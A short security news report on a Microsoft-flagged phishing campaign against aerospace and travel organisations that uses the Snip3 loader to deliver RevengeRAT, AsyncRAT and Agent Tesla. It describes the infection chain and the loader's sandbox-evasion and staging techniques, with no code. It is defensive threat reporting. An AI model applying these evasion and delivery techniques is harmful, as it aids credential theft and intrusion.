Microsoft has warned of a new phishing campaign aimed at aerospace and travel organizations that delivers multiple Remote Access Trojans (RATs), such as RevengeRAT and AsyncRAT using an actively developed loader called Snip3.
In a series of tweets Microsoft said that attackers use RATs to steal data, for follow-on activity and downloading additional payloads. Threat actor also leverages the Agent Tesla malware for data exfiltration.
The attack starts with a phishing email designed to look like it came from a legitimate organization with lures relevant to aviation, travel, or cargo. The message contains an image posing as a PDF file with an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads.
The RATs connect to an attacker-controlled server and downloads additional stages from sites such as Pastebin. The malware injects itself in processes like RegAsm, InstallUtil, or RevSvcs and steals credentials, screenshots and webcam data, browser and clipboard data, system and network information.
According to researchers at Morphisec, the Snip3 downloader, which was first spotted in the wild in February 2021, uses several advanced techniques to bypass detection:
-Executing PowerShell code with the ‘remotesigned’ parameter
-Validating the existence of Windows Sandbox and VMWare virtualization
-Using Pastebin and top4top for staging
-Compiling RunPE loaders on the endpoint in runtime
Snip3 is also able to detect whether the script is executed within Microsoft Sandbox, VMWare, VirtualBox, or Sandboxie environments, and if it so, the script terminates without loading the RAT payload.